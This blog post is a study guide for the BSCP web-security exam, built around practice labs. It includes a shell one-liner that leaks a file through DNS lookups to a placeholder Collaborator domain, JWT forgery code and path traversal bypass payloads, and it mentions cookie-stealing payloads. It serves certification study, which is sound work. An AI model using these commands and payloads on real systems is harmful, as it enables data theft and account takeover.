June 12, 2026
How To Pass the Burp Suite Certified Practitioner (BSCP) Exam in 2026
Shawn
7 min read
What the exam actually is
The BSCP is a 4-hour, fully hands-on, proctored, open-book practical exam for web application security. You get two web apps, and each one contains three deliberately planted vulnerabilities arranged into three sequential stages. That's six stages total, and you have to clear all six to pass. There's no partial credit: five out of six is a fail.
The three stages are always the same, and they must be solved in order, because each one unlocks the part of the app you attack next:
- Stage 1 — Get into ANY user account. It's not always carlos! Land any authenticated user session.
- Stage 2 — Reach the admin interface at `/admin` or equivalent. Either escalate your own privileges or compromise the administrator account.
- Stage 3 — Read `/home/carlos/secret` from the server's filesystem and submit it with the "Submit solution" button.
A few mechanics:
- It's open book. Your notes, the web, third-party tools, and any Burp extensions are all fair game. PortSwigger says so explicitly.
- There is no lab reset. If you delete your own account or nuke a core component, you can mess up the attempt and waste your credit. Be deliberate with destructive actions.
- The exam is dynamic. Different vulnerabilities and scenarios each time, so if you fail your first attempt, as I did, you will probably see different ones the next time.
The single most important mental model: figure out which stage you're on, then only hunt for the vulnerability classes that belong to that stage. Don't try to deserialize your way into a user account or do XSS on Stage 3. Map the bug families to the stages and you stop running in circles.
For example, the stage-to-vulnerability mapping from BotesJuan (linked in the Resources section) is a good guide.
The gotchas that failed my first attempt
Every PortSwigger lab trains you on carlos, but when it comes to the exam, it's NOT always carlos! Treat the username as something you discover, never something you assume.
On the exam you may only get DNS callbacks (no HTTP), which means you need to exfiltrate the secret over out-of-band DNS, for example by packing the file contents into a subdomain of your Collaborator address and resolving it with nslookup. The Practice Exam has examples of DNS callbacks using nslookup. Here are the YouTube walkthroughs of the Practice Exam:
https://www.youtube.com/watch?v=yC0F05oggTE
https://www.youtube.com/watch?v=fNoX_9v6-aY
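To make the DNS-only gotcha concrete, here is an added example (mine, not from the original post or from PortSwigger) of both ends of the exfiltration: the sh one-liner you inject into a blind OS command injection sink, and the decoder that turns the queries your Collaborator tab logs back into the file. The Collaborator domain, the chunk size and the sample queries are assumptions; substitute the domain from your own Collaborator tab.

```python
"""Out-of-band DNS exfiltration of a file via Burp Collaborator.

Added example, not from the original post. COLLAB is a placeholder; put the
domain from your own Collaborator tab there. The one-liner is what you inject
into a blind OS command injection sink; the decoder turns the queries that
Collaborator logs back into the file.
"""
import re

COLLAB = "xyz.oastify.com"  # assumption: placeholder, not a real Collaborator host
CHUNK = 60  # hex chars per query (30 bytes); a single DNS label holds at most 63


def build_exfil_command(path: str, collab: str = COLLAB, chunk: int = CHUNK) -> str:
    """POSIX sh one-liner: hex-encode `path`, split it, leak each piece as a subdomain.

    od/tr/fold are used rather than xxd or base64 because they exist on almost
    any box and hex is safe inside a hostname (base64 is not). Each query is
    <seq>.<hex>.<collab>; Collaborator does not preserve arrival order, so the
    sequence number is what lets the decoder reassemble the file.
    """
    if not 2 <= chunk <= 63 or chunk % 2:
        raise ValueError("chunk must be an even number of hex chars, at most 63")
    return (
        "i=0; "
        f"for c in $(od -An -tx1 -v {path} | tr -d ' \\n' | fold -w {chunk}); "
        f"do nslookup $i.$c.{collab}; i=$((i+1)); done"
    )


def encode_queries(data: bytes, collab: str = COLLAB, chunk: int = CHUNK) -> list[str]:
    """Model of the names the one-liner makes the target resolve (used to test the decoder)."""
    hexdata = data.hex()
    return [f"{i}.{hexdata[j:j + chunk]}.{collab}"
            for i, j in enumerate(range(0, len(hexdata), chunk))]


def decode_queries(names, collab: str = COLLAB) -> bytes:
    """Reassemble the file from the query names shown in the Collaborator tab.

    Order does not matter; retries of a chunk and unrelated probes against the
    same domain are ignored. A gap in the sequence numbers means a query was
    lost, so raise rather than hand back a silently truncated secret.
    """
    pattern = re.compile(r"^(\d+)\.([0-9a-f]+)\." + re.escape(collab) + r"\.?$", re.I)
    chunks: dict[int, str] = {}
    for name in names:
        m = pattern.match(name.strip())
        if m and len(m.group(2)) % 2 == 0:  # odd length means a truncated label
            chunks.setdefault(int(m.group(1)), m.group(2).lower())
    missing = [i for i in range(len(chunks)) if i not in chunks]
    if missing:
        raise ValueError(f"chunks {missing} never arrived; re-run the injection")
    return bytes.fromhex("".join(chunks[i] for i in range(len(chunks))))


if __name__ == "__main__":
    print(build_exfil_command("/home/carlos/secret"))
    # Constructed sample: what the Collaborator tab might show, out of order,
    # with one retry and one unrelated probe mixed in.
    seen = encode_queries(b"constructed-demo-secret-value\n")[::-1]
    seen += [seen[0], "http-probe." + COLLAB]
    print(decode_queries(seen))
```

The one-liner still has to fit the injection context you found: URL-encode it for a query parameter, and pick the separator (`;`, `|`, `$(...)`, newline) that the sink actually passes through. The decoder cannot detect a missing final chunk, so if the secret looks cut off, run the injection again.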
How to prepare
This is the plan I'd give anyone, in order.
1. Do every Apprentice and Practitioner lab in the Web Security Academy.
2. Do mystery labs blind.
3. Take the official practice exam. The real exam is structurally identical to the practice one, so take it as many times as you need.
4. Review the two GitHub resources linked at the end of this post; they are GOLD.
5. Load your payload lists and extensions into Burp ahead of time.
The labs that matter most, by stage
These are the labs I'd prioritize, grouped by the stage they map to.
Stage 1 — Get access to any user
This stage is going to be authentication flaws, XSS used to steal a session, web cache poisoning, and Host header attacks. So focus on Host header injection, web cache poisoning, XSS (especially DOM XSS), HTTP request smuggling and brute forcing. Don't waste time on XXE or any other Stage 2/3 technique here. Best labs to work on:
- Username enumeration via different responses
- SQL injection vulnerability allowing login bypass
- SQL injection in a WHERE clause retrieving hidden data
- Stored XSS into HTML context with nothing encoded
- Reflected XSS into HTML context with most tags and attributes blocked
- 2FA simple bypass
- Basic password reset poisoning (host header)
- Host header authentication bypass
- OS command injection, simple case (now go learn the OOB-exfil version — see the gotcha above)
- Username enumeration via subtly different responses / via account lock
- Brute-forcing a stay-logged-in cookie, and offline password cracking
- Exploiting XSS to steal cookies and to capture passwords
- Web cache poisoning: unkeyed header, multiple headers, and targeted poisoning via an unknown header
- HTTP request smuggling: basic CL.TE and TE.CL, capturing other users' requests, delivering reflected XSS
- DOM XSS via web messages (and the JSON.parse variant)
- Information disclosure in version control history
Stage 2 — Escalate to admin
This is going to be access control flaws (IDOR and friends), JWT, OAuth, CSRF, or SQL injection. Best labs to work on:
- User role controlled by a request parameter
- User ID controlled by a request parameter with password disclosure
- Method-based access control circumvented (GET instead of POST)
- URL-based access control circumvented (`X-Original-URL`)
- JWT authentication bypass via unverified signature
- JWT authentication bypass via flawed signature verification (`alg:none`)
- SQL injection UNION attack retrieving data from other tables
- SQL injection listing database contents on non-Oracle databases
- Authentication bypass via OAuth implicit flow
- Privilege escalation via server-side prototype pollution
- Web shell upload — Content-Type bypass, extension blacklist bypass, and obfuscated extension
- JWT: weak signing key brute force, jwk/jku header injection, kid header path traversal
- OAuth: forced profile linking, account hijacking via `redirect_uri`, stealing tokens via open redirect
- The CSRF family: token not tied to session, validation depends on request method, validation depends on token being present, Referer-based defenses
- SQLi: blind with conditional responses, time delays, and the filter bypass via XML encoding
- Modifying serialized data types
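The two JWT labs above are the quickest Stage 2 wins when they apply, and they are worth being able to do by hand as well as with jwt_tool. The following is an added example (mine, not from the original post, PortSwigger or jwt_tool) that mints a sample token with a constructed key, produces both forgeries, and shows the strict verification that a correct server performs, which rejects them. The key and claims are made up; on the exam you start from the session token the app issues.

```python
"""The two JWT forgeries from the Stage 2 labs, next to the check that stops them.

Added example, not from the original post. The signing key and the claims are
constructed for the demo; on the exam you work from the session token the app
issues, and jwt_tool automates the same steps.
"""
import base64
import hashlib
import hmac
import json

DEMO_KEY = b"constructed-demo-key"  # assumption: stands in for the server's secret


def b64url_encode(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def b64url_decode(segment: str) -> bytes:
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def encode_part(obj: dict) -> str:
    return b64url_encode(json.dumps(obj, separators=(",", ":")).encode())


def decode_part(segment: str) -> dict:
    return json.loads(b64url_decode(segment))


def sign_hs256(claims: dict, key: bytes) -> str:
    """Mint a legitimate token the way the app would (used to build the sample)."""
    signing_input = f"{encode_part({'alg': 'HS256', 'typ': 'JWT'})}.{encode_part(claims)}"
    mac = hmac.new(key, signing_input.encode(), hashlib.sha256).digest()
    return f"{signing_input}.{b64url_encode(mac)}"


def forge_unverified_signature(token: str, **new_claims) -> str:
    """Lab 'JWT authentication bypass via unverified signature': change the payload
    and leave header and signature exactly as issued. A server that decodes the
    token but never verifies it accepts this."""
    header_b64, payload_b64, signature = token.split(".")
    claims = decode_part(payload_b64)
    claims.update(new_claims)
    return f"{header_b64}.{encode_part(claims)}.{signature}"


def forge_alg_none(token: str, alg: str = "none", **new_claims) -> str:
    """Lab 'JWT authentication bypass via flawed signature verification': declare
    alg none and send an empty signature. `alg` is a parameter because some
    filters only reject the exact lowercase string, so "None" or "NONE" get through."""
    header_b64, payload_b64, _ = token.split(".")
    header, claims = decode_part(header_b64), decode_part(payload_b64)
    header["alg"] = alg
    claims.update(new_claims)
    return f"{encode_part(header)}.{encode_part(claims)}."


def verify_hs256(token: str, key: bytes):
    """What a correct server does: pin the algorithm, recompute the MAC over the
    exact bytes received, compare in constant time. Returns the claims or None."""
    try:
        header_b64, payload_b64, signature = token.split(".")
        header = decode_part(header_b64)
    except ValueError:  # wrong segment count, bad base64 or bad JSON
        return None
    if header.get("alg") != "HS256":  # rejects none/None/NONE and algorithm confusion
        return None
    mac = hmac.new(key, f"{header_b64}.{payload_b64}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(b64url_encode(mac), signature):
        return None
    return decode_part(payload_b64)


if __name__ == "__main__":
    issued = sign_hs256({"sub": "wiener"}, DEMO_KEY)  # constructed low-privilege session
    for name, forged in [("unverified signature", forge_unverified_signature(issued, sub="administrator")),
                         ("alg none", forge_alg_none(issued, sub="administrator"))]:
        print(name, decode_part(forged.split(".")[1]),
              "accepted by strict verifier:", verify_hs256(forged, DEMO_KEY) is not None)
```

Paste the forged token into the session cookie and request the admin path; if the app accepts either, you are on Stage 2's JWT branch. The strict verifier is the reference for what "properly checked" looks like: algorithm pinned, signature recomputed over the received bytes, constant-time compare.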
Stage 3 — Read /home/carlos/secret
Everything here is about reading a file or getting code execution: SSTI, directory traversal, XXE, SSRF, OS command injection, and deserialization. Best labs to work on:
- Basic SSRF against the local server
- Arbitrary object injection in PHP
- Server-side template injection: basic, using documentation, in an unknown language with a documented exploit, and with information disclosure via user-supplied objects
- File path traversal: simple case, sequences stripped non-recursively, superfluous URL-decode bypass, validation of start of path
- XXE: external entities to retrieve files, blind XXE exfil via a malicious external DTD, blind XXE via error messages, XInclude
- SSRF: blacklist-based filter, filter bypass via open redirection, against another back-end system
- Blind OS command injection with out-of-band data exfiltration — the stage-3 version of the gotcha
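The path traversal labs above each defeat one specific defence, and on the exam the trick is recognising which defence you are up against from how the app rejects or mangles your input. The following is an added example (mine, not from the original post or PortSwigger) that models the three defences from those labs as filters, runs the naive payload and the matching bypass through each, and reports which one actually resolves to the target file. The image directory is an assumption; the target file is the exam's.

```python
"""Path traversal bypasses from the Stage 3 labs, modelled end to end.

Added example, not from the original post. Each filter_* function models one
defence the labs use; simulate_request runs a raw parameter through the
framework's URL-decoding, the filter and the file open, and returns the path
that would actually be read. BASE_DIR is an assumption (the image directory
the labs serve from); TARGET is the exam's file.
"""
import posixpath
from urllib.parse import unquote

BASE_DIR = "/var/www/images"
TARGET = "/home/carlos/secret"


def resolve(filename: str, base: str = BASE_DIR) -> str:
    """Model of a naive open(base + '/' + filename): an absolute filename replaces
    the base, and normpath collapses '..' the way the kernel will."""
    return posixpath.normpath(posixpath.join(base, filename))


def filter_none(filename: str):
    """Simple case: no defence at all."""
    return filename


def filter_strip_once(filename: str):
    """Lab 'traversal sequences stripped non-recursively': a single pass removes
    '../', so '....//' collapses to '../' after the filter has run."""
    return filename.replace("../", "")


def filter_block_then_decode(filename: str):
    """Lab 'superfluous URL-decode': the framework has already decoded the
    parameter once; the filter blocks '../', then the app decodes AGAIN before
    opening the file, so a double-encoded sequence passes the check."""
    if "../" in filename or "..\\" in filename:
        return None
    return unquote(filename)


def filter_require_prefix(filename: str):
    """Lab 'validation of start of path': only checks that the supplied path
    begins with the expected directory, not where it ends up."""
    return filename if filename.startswith(BASE_DIR + "/") else None


def simulate_request(raw_param: str, filter_fn):
    """Framework decodes the query parameter once, the filter runs, the file is
    opened. Returns the resolved path, or None if the filter blocked the request."""
    filtered = filter_fn(unquote(raw_param))
    return None if filtered is None else resolve(filtered)


NAIVE = "../../../home/carlos/secret"
BYPASSES = {
    filter_strip_once: "....//....//....//home/carlos/secret",
    filter_block_then_decode: "..%252f..%252f..%252fhome/carlos/secret",
    filter_require_prefix: f"{BASE_DIR}/../../../home/carlos/secret",
}


def run_matrix():
    """Which payload reads the target under which defence (used by the demo and tests)."""
    return {
        fn.__name__: {
            "naive": simulate_request(NAIVE, fn) == TARGET,
            "bypass": simulate_request(payload, fn) == TARGET,
        }
        for fn, payload in BYPASSES.items()
    }


if __name__ == "__main__":
    for name, outcome in run_matrix().items():
        print(f"{name:26} naive reads secret: {outcome['naive']!s:5} "
              f"bypass reads secret: {outcome['bypass']}")
```

The diagnostic value is in the failure modes: if `..` survives but the slashes vanish, you are probably facing the strip-once filter; if a single-encoded `%2f` is rejected outright but `%252f` is not, the app is decoding twice; if the error message echoes an expected directory, try starting your path with it.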
Tooling: what to have ready and what each tool is for
You're allowed to use anything. Here's the kit I'd actually have open, mapped to where it earns its keep.
Burp's scanner: run targeted scans on specific injection points (see the Practical skills labs in the Academy) alongside manual testing.
The extensions I'd load: JWT Editor or JSON Web Tokens, HTTP Request Smuggler (smuggling detection and payload building), Java Deserialization Scanner (to fingerprint serialized objects), DOM Invader (DOM XSS and prototype pollution), Hackvertor, and Param Miner.
Other tools, by stage:
- DOMInvader — Use this to determine if you have a DOM XSS vulnerability.
- XSStrike — Although I didn't use this on the exam, it's still pretty useful to have in the toolkit.
- jwt_tool — Check JWT weaknesses (unverified signature, `alg:none`, weak-key brute force, jwk/jku/kid injection). Stage 2 stuff.
- ysoserial — Java deserialization gadget chains. See the practice exam for this. Stages 2–3 stuff.
- phpggc — PHP deserialization / object-injection gadget chains. Stages 2–3.
- sqlmap — automates SQLi discovery and data extraction; great for grabbing admin creds fast. Stages 1–2.
- SSTImap — automates server-side template injection through to RCE/file read. Stage 3.
Burp Collaborator. Nearly every blind and out-of-band variant in the exam routes through it: blind XXE, blind SQLi exfil, blind OS command injection, SSTI exfil. Get comfortable crafting payloads that ship data into a Collaborator subdomain.
Exam day playbook
- Budget the clock across both apps, not per stage. Four hours, six stages. If one stage turns into a rabbit hole, bank progress on the other app and come back.
- Scan first, then go manual. Let targeted scans surface the obvious injection points while you reason about the app.
- Write down every solution as you go. If the same bug recurs (and across attempts, they do), a written solution buys you free time later.
- Don't break the box. No reset, remember. Avoid deleting your own account or core components.
- Enumerate, enumerate, enumerate. As with most of these exams and the real world, build a good understanding of what the application does, how it behaves and where the main parts of its functionality live. Don't assume anything. The app is telling you things. Read the responses. Read the page source.
- New functionality — If new functionality appears after you reach a user account, that is probably your next path forward. Same once you reach the admin panel: a function you could not see before is most likely what you are supposed to target.
- Stuck? — Work through the automated and manual checks for the vulnerability classes that belong to the stage you are on. You should be able to identify which vulnerability it is at each stage; if you can't, go back to the stage-to-bug mapping. Stuck on crafting a payload? Use and customize the payloads in the two GitHub resources below for the specific vulnerability.
- Exam weirdness: Don't use more than 2 monitors! This messed up my 1st attempt: I was using 3 monitors and it basically bricked my computer for a good while when I started up their proctoring. So keep in mind not to exceed 2 screens or you will have a rough time! For my 2nd attempt, I loaded the proctoring in a new Chrome profile and only used 2 screens.
Resources
The two GitHub repos plus the PortSwigger Web Security Academy itself are all you need to pass this exam.
- PortSwigger Web Security Academy — the labs, the cheat sheets, and the official prep page. The source of truth: https://portswigger.net/web-security
- botesjuan/Burp-Suite-Certified-Practitioner-Exam-Study — a deep, well-maintained study repo. Their cookie-stealer payload collection is the one I leaned on for Stage 1 (Collaborator `fetch()`, `document.location` redirects, image `onerror` exfil, password-capture handlers), already adapted for the exploit server. Full credit to botesjuan. https://github.com/botesjuan/Burp-Suite-Certified-Practitioner-Exam-Study
- DingyShark/BurpSuiteCertifiedPractitioner — a stage-by-stage guide that organizes every vulnerability family by which stage it belongs to, with per-bug approaches and where each tends to live in the app. Full credit to DingyShark. https://github.com/DingyShark/BurpSuiteCertifiedPractitioner
Use the repos to understand technique and to recover when you're stuck, but do the labs yourself.
Final word
The BSCP isn't about memorizing payloads, it's about recognizing which bug family lives at which stage, enumerating instead of assuming, and being able to do out-of-band exfiltration. Do the labs, drill the mystery challenges blind, learn from the gotchas that got me, and you'll walk in ready.
Good luck. Go read that secret.